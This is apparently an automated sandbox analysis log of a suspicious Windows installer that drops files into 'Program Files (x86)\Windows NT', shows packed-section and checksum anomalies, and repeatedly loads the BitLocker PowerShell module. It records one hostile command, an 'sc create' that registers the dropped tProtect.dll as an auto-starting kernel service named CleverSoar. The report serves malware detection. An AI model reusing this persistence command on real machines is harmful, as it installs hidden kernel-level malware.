Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeStatic file information: File size 9897435 > 1048576
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1852873352.0000000000E40000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1852683211.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007557D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_007557D0
Source: update.vbc.6.drStatic PE information: real checksum: 0x0 should be: 0x3789ec
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeStatic PE information: real checksum: 0x0 should be: 0x97533d
Source: update.vbc.1.drStatic PE information: real checksum: 0x0 should be: 0x3789ec
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.5.drStatic PE information: real checksum: 0x0 should be: 0x343a62
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x343a62
Source: hrsw.vbc.6.drStatic PE information: real checksum: 0x0 should be: 0x3789ec
Source: tProtect.dll.12.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.0.drStatic PE information: section name: .didata
Source: update.vbc.1.drStatic PE information: section name: .00cfg
Source: update.vbc.1.drStatic PE information: section name: .voltbl
Source: update.vbc.1.drStatic PE information: section name: .aQ#
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.5.drStatic PE information: section name: .didata
Source: 7zr.exe.6.drStatic PE information: section name: .sxdata
Source: update.vbc.6.drStatic PE information: section name: .00cfg
Source: update.vbc.6.drStatic PE information: section name: .voltbl
Source: update.vbc.6.drStatic PE information: section name: .aQ#
Source: hrsw.vbc.6.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.6.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.6.drStatic PE information: section name: .aQ#
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC3BDDB push ecx; ret 6_2_6CC3BDEE
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CAE0F00 push ss; retn 0001h6_2_6CAE0F0A
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CD09F10 push eax; ret 6_2_6CD09F2E
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC6E9F4 push 004AC35Ch; ret 6_2_6CC6EA0E
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CD0A290 push eax; ret 6_2_6CD0A2BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006D45F4 push 0077C35Ch; ret 10_2_006D460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0076FB10 push eax; ret 10_2_0076FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0076FE90 push eax; ret 10_2_0076FEBE
Source: update.vbc.1.drStatic PE information: section name: .aQ# entropy: 7.189081398239323
Source: update.vbc.6.drStatic PE information: section name: .aQ# entropy: 7.189081398239323
Source: hrsw.vbc.6.drStatic PE information: section name: .aQ# entropy: 7.189081398239323
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeFile created: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpFile created: C:\Users\user\AppData\Local\Temp\is-Q5IJ4.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DNFUF.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DNFUF.tmp\update.vbcJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeFile created: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpFile created: C:\Users\user\AppData\Local\Temp\is-Q5IJ4.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpFile created: C:\Users\user\AppData\Local\Temp\is-Q5IJ4.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DNFUF.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
